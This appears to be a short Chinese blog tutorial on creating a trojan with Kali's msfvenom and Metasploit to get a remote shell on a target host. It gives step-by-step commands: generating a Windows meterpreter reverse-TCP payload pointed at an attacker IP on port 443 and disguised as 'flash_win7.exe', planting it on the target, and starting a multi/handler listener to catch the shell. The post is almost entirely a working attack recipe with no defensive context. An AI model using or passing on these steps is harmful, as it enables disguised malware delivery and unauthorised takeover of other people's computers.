用kali生成木马文件,获取目标主机shell

本文介绍如何使用MSFVenom生成恶意载荷,配合Metasploit进行渗透测试。从启动PostgreSQL服务开始,详细展示了载荷的生成过程,包括选择载荷、指定目标地址和端口,以及在目标主机上执行攻击。通过监听等待目标运行,最终实现后台shell的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1、service postgresql start 在主机中启动服务
2、msfvenom -l payload 查看支持的载荷
-p 选择一个载荷,或者说一个模块吧。
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-h 帮助
部分支持载荷如下
在这里插入图片描述3、msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.101.112.194 LPORT=443 -f exe X > flash_win7.exe 在home目录中生成一个flash_win7.exe文件,放入到目的主机中(需要注意)
4、msfconsole 进入msf模式
5、use exploit/multi/handler 使用渗透攻击
6、设置本地地址以及本地端口并开始攻击(exploit
7、监听,一旦目的主机运行运用,则被渗透
在这里插入图片描述
8、可直接输入shell 成功进入后台。
在这里插入图片描述第一次写博客,还是有很多不足啊。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值